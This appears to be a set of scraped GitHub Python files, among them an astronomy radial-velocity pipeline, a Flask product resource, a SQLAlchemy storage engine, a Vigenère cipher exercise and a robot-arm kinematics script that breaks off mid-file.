\nbffitlist = bff.gaussparty(gausspars, nspec, filenamelist, bfnormlist, bf_ind, amplimits, threshold, widlimits)\nrvraw1 = []; rvraw2 = []; rvraw1_err = []; rvraw2_err = []\nrvraw1.append(0), rvraw2.append(0), rvraw1_err.append(0), rvraw2_err.append(0)\nfor i in range(1, len(bffitlist)):\n rvraw1.append(bffitlist[i][0][1]) # [0,1,2] is amp,rv,width for star 1; [4,5,6] is same for star2\n rvraw2.append(bffitlist[i][0][4])\n rvraw1_err.append(bffitlist[i][2][1])\n rvraw2_err.append(bffitlist[i][2][4])\n\n# CALCULATE ORBITAL PHASES AND FINAL RV CURVE\nrvdata = bff.rvphasecalc(bjdinfile, bjdoffset, nspec, period, BJD0, rvraw1, rvraw1_err, rvraw2, rvraw2_err, rvstd, bcvstd)\nphase = rvdata[0]; bjdfunny = rvdata[1]\nrv1 = rvdata[2]; rv2 = rvdata[3]\nrv1_err = rvdata[4]; rv2_err = rvdata[5]\ng2 = open(outfile, 'w')\nprint('# RVs calculated with BF_python.py', file=g2)\nprint('#', file=g2)\nprint('# Porb = {0} days, BJD0 = {1} days'.format(period, BJD0), file=g2)\nprint('# Wavelength axis = [{0} - {1}] Angstroms'.format(w1[0], w1[-1]), file=g2)\nprint('#', file=g2)\nprint('# Template spectrum (line 0 of infiles): {0}'.format(filenamelist[0]), file=g2)\nprint('# RV of template, BCV of template (km/s): {0}, {1}'.format(rvstd, bcvstd), file=g2)\nprint('#', file=g2)\nprint('# List of all input spectra (infiles): {0}'.format(infiles), file=g2)\nprint('# Target BJD and BCV info (bjdinfile): {0}'.format(bjdinfile), file=g2)\nprint('# Gaussian fit guesses (gausspars): {0}'.format(gausspars), file=g2)\nprint('#', file=g2)\nprint('# BF parameters: w00 = {0}; n = {1}; stepV = {2}'.format(w00, n, stepV), file=g2)\nprint('# BF parameters: smoothstd = {0}; m = {1}'.format(smoothstd, m), file=g2)\nprint('# gaussfit: amplimits = {0}; threshold = {1}, widlimits = {2}'.format(amplimits, threshold, widlimits), file=g2)\nprint('#', file=g2)\nprint('# time, phase, adjusted_time, RV1 [km/s], error1 [km/s], RV2 [km/s], error2 [km/s]', file=g2)\nprint('#', file=g2)\nfor i in range(1, nspec):\n print('%.9f %.9f %.9f %.5f %.5f %.5f %.5f' % (bjdfunny[i] + bjdoffset, phase[i], bjdfunny[i], \n rv1[i], rv1_err[i], rv2[i], rv2_err[i]), file=g2)\ng2.close()\nprint('BJD, phase, and RVs written to %s.' % outfile)\nprint('Use rvplotmaker.py to plot the RV curve.')\n\ntry:\n bfout = open(bfoutfile, 'w')\n for idx in range(1, nspec):\n print('###', file=bfout)\n print('# timestamp: {0}'.format(datetimelist[idx]), file=bfout)\n # index with the loop variable idx (a bare i here would silently reuse a stale value from the loop above)\n print('# Gaussian 1 [amp, RV +/- err, wid]: [{0:.2f}, {1:.2f} +/- {2:.2f}, {3:.2f}]'.format(bffitlist[idx][0][0], rvraw1[idx], rvraw1_err[idx], bffitlist[idx][0][2]), file=bfout)\n print('# Gaussian 2 [amp, RV +/- err, wid]: [{0:.2f}, {1:.2f} +/- {2:.2f}, {3:.2f}]'.format(bffitlist[idx][0][3], rvraw2[idx], rvraw2_err[idx], bffitlist[idx][0][5]), file=bfout)\n print('# Uncorrected_RV, BF_amp, Gaussian_fit', file=bfout)\n print('###', file=bfout)\n for vel, amp, modamp in zip(bf_ind, bfsmoothlist[idx], bffitlist[idx][1]):\n print(vel, amp, modamp, file=bfout)\n bfout.close()\nexcept Exception:\n print('No BF outfile specified, not saving BF data to file')\n \n# handy little gaussian function maker\ndef gaussian(x, amp, mu, sig): # i.e., (xarray, amp, rv, width)\n return amp * np.exp(-np.power(x - mu, 2.) / (2 * np.power(sig, 2.)))
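\n\n# Added sanity check (hedged; not part of the original pipeline): rebuild the two fitted\n# components for the first non-template spectrum and confirm they reproduce the stored\n# two-Gaussian model, assuming the [amp, rv, wid] x 2 layout of bffitlist[i][0] noted above.\ncheck1 = gaussian(bf_ind, bffitlist[1][0][0], bffitlist[1][0][1], bffitlist[1][0][2])\ncheck2 = gaussian(bf_ind, bffitlist[1][0][3], bffitlist[1][0][4], bffitlist[1][0][5])\nprint('Max |rebuilt model - stored fit| for spectrum 1: %.6f' % np.max(np.abs(check1 + check2 - bffitlist[1][1])))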
\n\n# PLOT THE FINAL SMOOTHED BFS + GAUSSIAN FITS IN INDIVIDUAL PANELS\n# manually adjust this multi-panel plot based on how many spectra you have\n#plt.figure(4)\nwindowcols = 4 # how many window columns there should be\n#windowrows = 6\nwindowrows = int([np.rint((nspec-1)/windowcols) if (float(nspec-1)/windowcols)%windowcols == 0 else np.rint((nspec-1)/windowcols)+1][0])\nxmin = rvneg\nxmax = rvpos\n#gaussxs = np.arange(-200, 200, 0.1)\nfig = plt.figure(1, figsize=(15,10))\nfig.text(0.5, 0.04, 'Uncorrected Radial Velocity (km s$^{-1}$)', ha='center', va='center', size=26)\nfig.text(0.07, 0.5, 'Broadening Function', ha='center', va='center', size=26, rotation='vertical')\nfor i in range (1,nspec):\n ax = fig.add_subplot(windowrows, windowcols,i) # out of range if windowcols x windowrows < nspec\n ax.yaxis.set_major_locator(MultipleLocator(0.2))\n if i!=1 and i!=5 and i!=9 and i!=13 and i!=17 and i!=21 and i!=25:\n ax.set_yticklabels(())\n #if i!=20 and i!=21 and i!=22 and i!=23 and i!=24 and i!=25:\n if i < nspec-windowrows:\n #if i!=13 and i!=14 and i!=15 and i!=16:\n ax.set_xticklabels(())\n plt.subplots_adjust(wspace=0, hspace=0)\n plt.axis([xmin, xmax, ymin, ymax])\n plt.tick_params(axis='both', which='major', labelsize=14)\n plt.text(xmax - 0.25*(np.abs(xmax-xmin)), 0.8*ymax, '%.3f $\\phi$' % (phase[i]), size=12)\n plt.text(xmax - 0.35*(np.abs(xmax-xmin)), 0.6*ymax, '%s' % (datetimelist[i].iso[0:10]), size=12)\n #plt.plot(bf_ind, bfsmoothlist[i], color='k', lw=1.5, ls='-', label='Smoothed BF')\n plt.plot(bf_ind, bfnormlist[i], color='k', lw=1.5, ls='-', label='Normalized Smoothed BF')\n plt.plot(bf_ind, bffitlist[i][1], color='b', lw=2, ls='--', label='Two Gaussian fit')\n gauss1 = gaussian(bf_ind, bffitlist[i][0][0], bffitlist[i][0][1], bffitlist[i][0][2])\n gauss2 = gaussian(bf_ind, bffitlist[i][0][3], bffitlist[i][0][4], bffitlist[i][0][5])\n plt.plot(bf_ind, gauss1, color='#e34a33', lw=2, ls='--')#, label='Gaussian fit 1')\n plt.plot(bf_ind, gauss2, color='#fdbb84', lw=2, ls='--')#, label='Gaussian fit 2')\n # OPTION TO PLOT VERTICAL LINE AT ZERO\n plt.axvline(x=0, color='0.75') \n # print legend\n if i==nspec-1: ax.legend(bbox_to_anchor=(2.6,0.7), loc=1, borderaxespad=0., \n frameon=False, handlelength=3, prop={'size':20})\nplt.show()","repo_name":"mrawls/BF-rvplotter","sub_path":"BF_python.py","file_name":"BF_python.py","file_ext":"py","file_size_in_byte":16344,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"67"}
+{"seq_id":"37236321237","text":"# -*- coding: utf-8 -*-\n#python\nlista=[] # initialize the list variable\nlista.append(2) # put 2\nlista.append(7) # put 7\nlista.append(3) # put 3 \nfirst = lista[0] # first = 2 { get first element }\nlast = lista[-1] # last = 3 {get last element }\nlista.append(8) # put 8\ntres = lista[2] # tres = 3 {get 3}\ndois = lista[1] # dois = 7 {get 2}\nprint(lista) # [2, 7, 3, 8]\nlista.pop(2) # remove the 3rd element\nprint(lista) # [2, 7, 8]\n\n#test\nprint(first,last,dois,tres) # 2 3 7 3\n\nlista = [] # clear\n\n# Note\n# If you want to remove the element \"2\", use the command\n# lista.remove(2)\n# in the challenge exercise I may have confused the element's position with the element itself,\n# so line 12 would become\n# lista.remove(3) \n# and the final list would be => lista = [2, 7, 8]\n\n
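# Added illustration (hedged, not in the original exercise): pop() removes by index,\n# remove() removes by value -- both leave [2, 7, 8] here.\ndemo = [2, 7, 3, 8]\ndemo.pop(2)     # removes the element at index 2\nprint(demo)     # [2, 7, 8]\ndemo = [2, 7, 3, 8]\ndemo.remove(3)  # removes the first element whose value is 3\nprint(demo)     # [2, 7, 8]\n\n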
exit\n\n","repo_name":"Marcdnd/Kryptus-desafio-python","sub_path":"desafio-1.py","file_name":"desafio-1.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16282724946","text":"from flaskApp.models.Proizvod import ProizvodModel\nfrom flaskApp.models.Korisnik import KorisnikModel\nfrom flaskApp.models.TipProizvoda import TipProizvodaModel\nfrom flaskApp.resource.Upotreba import Upotereba\nclass Proizvod:\n\n @classmethod\n def vratiProizvodeZaFirmu(cls,naziv):\n id=KorisnikModel.find_firma(naziv).id\n lista=[]\n for i in ProizvodModel.find_all_with_id(id):\n lista.append(i.json())\n return lista\n\n @classmethod\n def dodajProizvod(cls,data):\n if ProizvodModel.find_one(data['naziv'],data['korisnikID'],data['kolicina']):\n return {'Poruka':'Uneti proizvod vec postoji!'}\n else:\n if TipProizvodaModel.find_one(data['tipID']):\n if KorisnikModel.find_one_id(data['korisnikID']):\n proizvod=ProizvodModel(data['cena'],data['naziv'],data['organsko'],data['korisnikID'],data['tipID'],data['kolicina'])\n proizvod.add()\n for i in data['sastojci']:\n Upotereba.poveziSastojkeSaProizvodima(ProizvodModel.find_one(data['naziv'],data['korisnikID'],data['kolicina']).id,i['id'])\n return {'Poruka':'Uspesno je unet proizvod {0}'.format(data['naziv'])}\n else:\n return {'Greska':'Uneseni proizvod nije od korektnog korisnika!'} \n else:\n return {'Greska':'Uneseni proizvod nije korektnog tipa!'}\n \n \n @classmethod\n def uradiFilter(cls,vrednost):\n result=[]\n proizvodi=ProizvodModel.find_all()\n for i in proizvodi:\n if vrednost.lower() in i.naziv.lower():\n result.append(i)\n return result \n\n\n","repo_name":"NeskovicStefan2402/Epijaca","sub_path":"Envs/projekat1VENV/platformaBackend/flaskApp/resource/Proizvod.py","file_name":"Proizvod.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"sh","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30884443139","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 11 13:01:15 2019\n@author: eneemann\nScript to move multiple alias rows with the same joining ID into multiple columns on the same row\n\n\"\"\"\n\nimport os\nimport time\nimport pandas as pd\nimport numpy as np\n\n\n# Start timer and print start time in UTC\nstart_time = time.time()\nreadable_start = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime())\nprint(\"The script start time is {}\".format(readable_start))\n\nwork_dir = r'C:\\E911\\Layton\\working_data'\nalias = pd.read_csv(os.path.join(work_dir, 'CP_Aliases.csv'))\n\nmax_alias = alias['CommonPlacePointID'].value_counts().max()\n\nworking = alias.copy().sort_values('CommonPlacePointID')\n\nfor i in np.arange(max_alias):\n working[f'Alias_{i+2}'] = None\n\ncp_id = list(set(working['CommonPlacePointID'].to_list()))\n\ncompleted_ids = []\n\nfor idx, row in working.iterrows():\n temp_id = row['CommonPlacePointID']\n if temp_id not in completed_ids:\n temp_df = working[working['CommonPlacePointID'] == temp_id]\n new_aliases = temp_df['CommonPlaceAlias Name'].to_list()\n if len(new_aliases) > 1:\n print(new_aliases)\n # Update row for each alias in a new column\n for i in np.arange(1, len(new_aliases)):\n col_name = f'Alias_{i+1}'\n working.loc[idx, col_name] = new_aliases[i]\n \n del temp_df\n del temp_id\n \n completed_ids.append(temp_id)\n \nwork2 = working.drop_duplicates('CommonPlacePointID') \nwork2.to_csv(os.path.join(work_dir, 'CP_multiple_Aliases.csv'))\n\nprint(\"Script shutting down 
...\")\n# Stop timer and print end time in UTC\nreadable_end = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime())\nprint(\"The script end time is {}\".format(readable_end))\nprint(\"Time elapsed: {:.2f}s\".format(time.time() - start_time))\n","repo_name":"eneemann/Python-Tools","sub_path":"multiple_rows_to_multiple_columns.py","file_name":"multiple_rows_to_multiple_columns.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"36830744636","text":"#!/usr/bin/python3\n\"\"\"\nDBstorage\n\"\"\"\nimport os\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker, scoped_session\nfrom models.base_model import Base\nfrom models.state import State\nfrom models.city import City\n\n\nclass DBstorage:\n \"\"\"defines DBstorage class\"\"\"\n __engine = None\n __session = None\n\n def __init__(self):\n \"\"\"initialise instance\"\"\"\n self.__engine = create_engine('mysql+mysqldb://{}:{}@{}/{}'.format(\n os.getenv('HBNB_MYSQL_USER'), os.getenv('HBNB_MYSQL_PWD'),\n os.getenv('HBNB_MYSQL_HOST'), os.getenv('HBNB_MYSQL_DB')),\n pool_pre_ping=True)\n if os.getenv('HBNB_ENV') == 'test':\n Base.metadata.drop_all()\n\n def all(self, cls=None):\n \"\"\"query on the current database session (self.__session) all\n objects depending of the class name\"\"\"\n all_obj = {}\n if cls is not None:\n for row in self.__session.query(cls):\n key = row.__class__.__name__ + '.' + row.id\n all_obj.update({key: row})\n return all_obj\n else:\n models = {mapper.class_.__name__: mapper.class_\n for mapper in Base.registry.mappers}\n for key in list(models.keys()):\n for row in self.__session.query(models[key]):\n key = row.__class__.__name__ + '.' + row.id\n all_obj.update({key: row})\n return all_obj\n\n def new(self, obj):\n \"\"\"add the object to the current database session (self.__session)\"\"\"\n self.__session.add(obj)\n\n def save(self):\n \"\"\"commit all changes of current database session (self.__session)\"\"\"\n self.__session.commit()\n\n def delete(self, obj=None):\n \"\"\"delete from the current database session obj if not None\"\"\"\n if obj is not None:\n self.__session.delete(obj)\n\n def reload(self):\n \"creates all tables in database and current database session\"\n from models.state import State\n from models.city import City\n from models.user import User\n from models.place import Place\n from models.review import Review\n from models.amenity import Amenity\n\n Base.metadata.create_all(self.__engine)\n session_factory = sessionmaker(bind=self.__engine,\n expire_on_commit=False)\n Session = scoped_session(session_factory)\n self.__session = Session()\n","repo_name":"abdisag1/AirBnB_clone_v2","sub_path":"models/engine/db_storage.py","file_name":"db_storage.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2908096131","text":"from rich.console import Console\n\nfrom states import login\n\nconsole = Console()\n\n# Colors used by the console\nbase_color = \"light_salmon3\"\nsuccess_color = \"spring_green3\"\nfail_color = \"red3\"\n\n\ndef main():\n login.start()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ThowV/instagram-follow-resolver","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} 
+{"seq_id":"43704590470","text":"#!/usr/bin/env python\n\n# This scripts takes 2 arguments, 1) Input power file 2) Output power file.\n# It reads the power spectrum file with given z, k, power, error.\n# It then creates a weighted smooth spline:\n# WITHOUT MASKING ANY POINTS,\n# But weighting each point with 1/error\n# If --interp_log is passed as 3rd argument:\n# It MASKS P, e < 0. \n# Interpolates (ln(1+z), lnk, lnP) with weights e/P\n# Finally, it saves this smooth power in the same order to the output text file.\n\nfrom numpy import genfromtxt, log, exp, savetxt\nfrom scipy.interpolate import SmoothBivariateSpline\nfrom argparse import ArgumentParser\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument(\"InputPS\", help=\"Input power spectrum file.\")\n parser.add_argument(\"OutputPS\", help=\"Output power spectrum file.\")\n parser.add_argument(\"--interp_log\", action=\"store_true\",\n help=\"Interpolate ln(k), ln(P) instead.\")\n args = parser.parse_args()\n \n # Read input power file.\n z, k, p, e = genfromtxt(args.InputPS, delimiter=' ', skip_header=2, unpack=True)\n\n # Create 2D Spline object\n # From scipy manual:\n # Default s=len(weight) which should be a good value \n # if 1/weight[i] is an estimate of the standard deviation of power[i].\n\n if args.interp_log:\n print(\"Smoothing ln(k), ln(P) and removing p,e<=0 points.\")\n mask = (p > 0) & (e > 0)\n\n lnz = log(1+z[mask])\n lnk = log(k[mask])\n lnP = log(p[mask])\n lnE = e[mask]/p[mask]\n\n wsbispline = SmoothBivariateSpline(lnz, lnk, lnP, w=1./lnE, s=len(lnE))\n\n smwe_power = wsbispline(log(1+z), log(k), grid=False)\n smwe_power = exp(smwe_power)\n else:\n print(\"Smoothing k, P without masking any points.\")\n wsbispline = SmoothBivariateSpline(z, k, p, w=1./e, s=len(e))\n\n smwe_power = wsbispline(z, k, grid=False)\n\n savetxt(args.OutputPS, smwe_power, header='', comments='')\n exit(0)\n","repo_name":"p-slash/lyspeq","sub_path":"py/smbivspline.py","file_name":"smbivspline.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"16671954495","text":"# boj.kr/17951\n\ndef answer(L, max_v):\n global k\n left, right = 0, max_v\n\n while left <= right:\n mid = (left + right) // 2\n\n count = 0\n now = 0\n for i in range(n):\n now += L[i]\n if now >= mid:\n count += 1\n now = 0\n\n if count >= k:\n left = mid + 1\n else:\n right = mid - 1\n return left - 1\n\nimport sys\ninput = sys.stdin.readline\nn, k = map(int, input().split())\nL = list(map(int, input().split()))\nmax_value = 0\nfor i in range(n):\n max_value += L[i]\nprint(answer(L, max_value))\n","repo_name":"kjh03160/Algorithm_Basic","sub_path":"practice/ETC/Exam_17951.py","file_name":"Exam_17951.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"30611946072","text":"#The first step is to make sure all encrypted characters are part of the Alphabet\r\ndef _pad_key(plaintext, key):\r\n padded_key = ''\r\n i = 0\r\n for char in plaintext:\r\n if char.isalpha():\r\n padded_key += key[i % len(key)]\r\n i += 1\r\n else:\r\n padded_key += ' '\r\n return padded_key\r\n#The second step is the core step when it comes to deciphering plaintext into ciphertext with both lower and uppercase separate\r\ndef _encrypt_char(plaintext_char, keyword_char):\r\n if plaintext_char.isalpha():\r\n first_alphabet_letter = 'a'\r\n if plaintext_char.isupper():\r\n 
first_alphabet_letter = 'A'\r\n\r\n old_char_position = ord(plaintext_char) - ord(first_alphabet_letter)\r\n key_char_position = ord(keyword_char.lower()) - ord('a')\r\n new_char_position = (old_char_position + key_char_position) % 26\r\n return chr(new_char_position + ord(first_alphabet_letter))\r\n return plaintext_char\r\n\r\n#This sets ciphertext to the product of the Vigenère Cipher from the message(plaintext) and key(keyword)\r\ndef encrypt(plaintext, key):\r\n ciphertext = ''\r\n padded_key = _pad_key(plaintext, key)\r\n for plaintext_char, key_char in zip(plaintext, padded_key):\r\n ciphertext += _encrypt_char(plaintext_char, key_char)\r\n return ciphertext\r\n\r\n#The final step inputs the variables from the input coming from the user\r\nplaintext = input('Enter a message: ')\r\nkey = input('Enter a key: ')\r\nciphertext = encrypt(plaintext, key)\r\nprint(f'Ciphertext: {ciphertext}')","repo_name":"touthecode/assignment","sub_path":"Assignment 2_2.py","file_name":"Assignment 2_2.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71405767895","text":"\"\"\"\r\n\tcode by purushotam kumar agrawal {git --> PURU2411 }\r\n\tInverse kinematics of 6 dof KUKA arm\r\n\"\"\"\r\n\r\nfrom sympy import symbols, cos, sin, pi, simplify, pprint, tan, expand_trig, sqrt, trigsimp, atan2\r\nfrom sympy.matrices import Matrix\r\n\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nimport numpy as np\r\n\r\n# declaring the link length of the arm\r\na1 = 1.0\r\na2 = 1.0\r\na3 = 5.0\r\na4 = 5.0\r\na5 = 0.2\r\n\r\ndt = 0.001 # choosing dt = 1 ms\r\n\r\n################################################################################################################\r\n################################################################################################################\r\n# forward kinematics is to verify the output and plot the graph\r\n\r\ndef forward_kin(q1, q2, q3, q4, q5, q6):\r\n X = []\r\n Y = []\r\n Z = []\r\n\r\n # DH parameter table of the given robotic arm see figure\r\n DH = np.array([[q1, np.pi / 2, a2, a1],\r\n [q2, 0, a3, 0],\r\n [q3 + np.pi / 2, np.pi / 2, 0, 0],\r\n [q4, -np.pi / 2, 0, a4],\r\n [q5, np.pi / 2, 0, 0],\r\n [q6, 0, 0, a5]])\r\n\r\n # homogeneous matrices\r\n H0_0 = Matrix([[1, 0, 0, 0],\r\n [0, 1, 0, 0],\r\n [0, 0, 1, 0],\r\n [0, 0, 0, 1]])\r\n\r\n H0_1 = Matrix([[np.cos(DH[0, 0]), -np.sin(DH[0, 0]) * np.cos(DH[0, 1]), np.sin(DH[0, 0]) * np.sin(DH[0, 1]), DH[0, 2] * np.cos(DH[0, 0])],\r\n [np.sin(DH[0, 0]), np.cos(DH[0, 0]) * np.cos(DH[0, 1]), -np.cos(DH[0, 0]) * np.sin(DH[0, 1]), DH[0, 2] * np.sin(DH[0, 0])],\r\n [0, np.sin(DH[0, 1]), np.cos(DH[0, 1]), DH[0, 3]],\r\n [0, 0, 0, 1]])\r\n\r\n H1_2 = Matrix([[np.cos(DH[1, 0]), -np.sin(DH[1, 0]) * np.cos(DH[1, 1]), np.sin(DH[1, 0]) * np.sin(DH[1, 1]), DH[1, 2] * np.cos(DH[1, 0])],\r\n [np.sin(DH[1, 0]), np.cos(DH[1, 0]) * np.cos(DH[1, 1]), -np.cos(DH[1, 0]) * np.sin(DH[1, 1]), DH[1, 2] * np.sin(DH[1, 0])],\r\n [0, np.sin(DH[1, 1]), np.cos(DH[1, 1]), DH[1, 3]],\r\n [0, 0, 0, 1]])\r\n\r\n H0_2 = np.dot(H0_1, H1_2)\r\n\r\n H2_3 = Matrix([[np.cos(DH[2, 0]), -np.sin(DH[2, 0]) * np.cos(DH[2, 1]), np.sin(DH[2, 0]) * np.sin(DH[2, 1]), DH[2, 2] * np.cos(DH[2, 0])],\r\n [np.sin(DH[2, 0]), np.cos(DH[2, 0]) * np.cos(DH[2, 1]), -np.cos(DH[2, 0]) * np.sin(DH[2, 1]), DH[2, 2] * np.sin(DH[2, 0])],\r\n [0, np.sin(DH[2, 1]), np.cos(DH[2, 1]), DH[2, 3]],\r\n [0, 0, 0, 1]])\r\n\r\n H0_3 = 
np.dot(H0_2, H2_3)\r\n\r\n H3_4 = Matrix([[np.cos(DH[3, 0]), -np.sin(DH[3, 0]) * np.cos(DH[3, 1]), np.sin(DH[3, 0]) * np.sin(DH[3, 1]), DH[3, 2] * np.cos(DH[3, 0])],\r\n [np.sin(DH[3, 0]), np.cos(DH[3, 0]) * np.cos(DH[3, 1]), -np.cos(DH[3, 0]) * np.sin(DH[3, 1]), DH[3, 2] * np.sin(DH[3, 0])],\r\n [0, np.sin(DH[3, 1]), np.cos(DH[3, 1]), DH[3, 3]],\r\n [0, 0, 0, 1]])\r\n\r\n H0_4 = np.dot(H0_3, H3_4)\r\n\r\n H4_5 = Matrix([[np.cos(DH[4, 0]), -np.sin(DH[4, 0]) * np.cos(DH[4, 1]), np.sin(DH[4, 0]) * np.sin(DH[4, 1]), DH[4, 2] * np.cos(DH[4, 0])],\r\n [np.sin(DH[4, 0]), np.cos(DH[4, 0]) * np.cos(DH[4, 1]), -np.cos(DH[4, 0]) * np.sin(DH[4, 1]), DH[4, 2] * np.sin(DH[4, 0])],\r\n [0, np.sin(DH[4, 1]), np.cos(DH[4, 1]), DH[4, 3]],\r\n [0, 0, 0, 1]])\r\n\r\n H0_5 = np.dot(H0_4, H4_5)\r\n\r\n H5_6 = Matrix([[np.cos(DH[5, 0]), -np.sin(DH[5, 0]) * np.cos(DH[5, 1]), np.sin(DH[5, 0]) * np.sin(DH[5, 1]), DH[5, 2] * np.cos(DH[5, 0])],\r\n [np.sin(DH[5, 0]), np.cos(DH[5, 0]) * np.cos(DH[5, 1]), -np.cos(DH[5, 0]) * np.sin(DH[5, 1]), DH[5, 2] * np.sin(DH[5, 0])],\r\n [0, np.sin(DH[5, 1]), np.cos(DH[5, 1]), DH[5, 3]],\r\n [0, 0, 0, 1]])\r\n\r\n H0_6 = np.dot(H0_5, H5_6)\r\n\r\n # print(\"R0_6 comes out to be: \")\r\n # print(np.matrix(H0_6[:3, :3]))\r\n\r\n X.append(0)\r\n X.append(0)\r\n X.append(H0_1[0, 3])\r\n X.append(H0_2[0, 3])\r\n X.append(H0_3[0, 3])\r\n X.append(H0_4[0, 3])\r\n X.append(H0_5[0, 3])\r\n X.append(H0_6[0, 3])\r\n\r\n Y.append(0)\r\n Y.append(0)\r\n Y.append(H0_1[1, 3])\r\n Y.append(H0_2[1, 3])\r\n Y.append(H0_3[1, 3])\r\n Y.append(H0_4[1, 3])\r\n Y.append(H0_5[1, 3])\r\n Y.append(H0_6[1, 3])\r\n\r\n Z.append(0)\r\n Z.append(a1)\r\n Z.append(H0_1[2, 3])\r\n Z.append(H0_2[2, 3])\r\n Z.append(H0_3[2, 3])\r\n Z.append(H0_4[2, 3])\r\n Z.append(H0_5[2, 3])\r\n Z.append(H0_6[2, 3])\r\n\r\n # center of all the frames in ground frame\r\n X = np.reshape(X, (1, 8))\r\n Y = np.reshape(Y, (1, 8))\r\n Z = np.reshape(Z, (1, 8))\r\n\r\n return X, Y, Z\r\n\r\n\r\n\r\ndef create_plot():\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111, projection='3d')\r\n ax.set_xlabel('x axis')\r\n ax.set_ylabel('y axis')\r\n ax.set_zlabel('z axis')\r\n ax.set_autoscale_on(False)\r\n # fig.canvas.draw()\r\n # plt.show()\r\n return fig, ax\r\n\r\n\r\ndef update_plot(X, Y, Z, X1, Y1, Z1, fig, ax):\r\n X = np.reshape(X, (1, 8))\r\n Y = np.reshape(Y, (1, 8))\r\n Z = np.reshape(Z, (1, 8))\r\n ax.cla()\r\n ax.plot_wireframe(X, Y, Z)\r\n ax.plot_wireframe(X1, Y1, Z1, color = 'r')\r\n # print('in update ', X1, Y1, Z1)\r\n plt.draw()\r\n ax.set_xlabel('x axis')\r\n ax.set_ylabel('y axis')\r\n ax.set_zlabel('z axis')\r\n ax.set_autoscale_on(False)\r\n fig.canvas.draw()\r\n fig.canvas.flush_events()\r\n plt.pause(.001)\r\n # ax.cla()\r\n # ax.plot_wireframe(Z,Y,X,color='r')\r\n # plt.pause(.5)\r\n # ax.plot_wireframe(Z,Y,X,color='b')\r\n # plt.pause(3)\r\n # plt.show()\r\n\r\n################################################################################################################\r\n################################################################################################################\r\n\r\n\r\n# this function is used only to calculate some of the matrices used in it's original trigonometric form like R0_3 and R3_6\r\ndef printMatrices():\r\n a, b, c = symbols('alpha beta gama', real=True)\r\n # rotation matrix after rotating around y-axis (pitch)\r\n A = Matrix([[cos(a), 0, sin(a)], [0, 1, 0], [-sin(a), 0, cos(a)]])\r\n\r\n # rotation matrix after rotating around z-axis (roll)\r\n B = Matrix([[cos(b), -sin(b), 
0], [sin(b), cos(b), 0], [0, 0, 1]])\r\n\r\n # rotation matrix after rotating around x-axis (yaw)\r\n C = Matrix([[1, 0, 0], [0, cos(c), -sin(c)], [0, sin(c), cos(c)]])\r\n\r\n # after total rotation of pitch, roll and yaw\r\n D = A * B * C\r\n print(D)\r\n\r\n q1, q2, q3, q4, q5, q6 = symbols('q1:7')\r\n a1, a2, a3, a4, a5, a6, a7 = symbols('a1:8')\r\n\r\n # DH parameter of the given arm\r\n DH = Matrix([[q1, pi/2, a2, a1],\r\n [q2, 0, a3, 0 ],\r\n [q3+pi/2, pi/2, 0, 0],\r\n [q4, -pi/2, 0, a4],\r\n [q5, pi/2, 0, 0],\r\n [q6, 0, 0, a5]])\r\n\r\n # homogeneous matrices\r\n H0_1 = Matrix([[cos(DH[0,0]), -sin(DH[0,0])*cos(DH[0,1]), sin(DH[0,0])*sin(DH[0,1]), DH[0,2]*cos(DH[0,0])],\r\n [sin(DH[0,0]), cos(DH[0,0])*cos(DH[0,1]), -cos(DH[0,0])*sin(DH[0,1]), DH[0,2]*sin(DH[0,0])],\r\n [0, sin(DH[0,1]), cos(DH[0,1]), DH[0,3] ],\r\n [0, 0, 0, 1 ]])\r\n\r\n H1_2 = Matrix([[cos(DH[1,0]), -sin(DH[1,0])*cos(DH[1,1]), sin(DH[1,0])*sin(DH[1,1]), DH[1,2]*cos(DH[1,0])],\r\n [sin(DH[1,0]), cos(DH[1,0])*cos(DH[1,1]), -cos(DH[1,0])*sin(DH[1,1]), DH[1,2]*sin(DH[1,0])],\r\n [0, sin(DH[1,1]), cos(DH[1,1]), DH[1,3] ],\r\n [0, 0, 0, 1 ]])\r\n\r\n H2_3 = Matrix([[cos(DH[2,0]), -sin(DH[2,0])*cos(DH[2,1]), sin(DH[2,0])*sin(DH[2,1]), DH[2,2]*cos(DH[2,0])],\r\n [sin(DH[2,0]), cos(DH[2,0])*cos(DH[2,1]), -cos(DH[2,0])*sin(DH[2,1]), DH[2,2]*sin(DH[2,0])],\r\n [0, sin(DH[2,1]), cos(DH[2,1]), DH[2,3] ],\r\n [0, 0, 0, 1 ]])\r\n\r\n H3_4 = Matrix([[cos(DH[3,0]), -sin(DH[3,0])*cos(DH[3,1]), sin(DH[3,0])*sin(DH[3,1]), DH[3,2]*cos(DH[3,0])],\r\n [sin(DH[3,0]), cos(DH[3,0])*cos(DH[3,1]), -cos(DH[3,0])*sin(DH[3,1]), DH[3,2]*sin(DH[3,0])],\r\n [0, sin(DH[3,1]), cos(DH[3,1]), 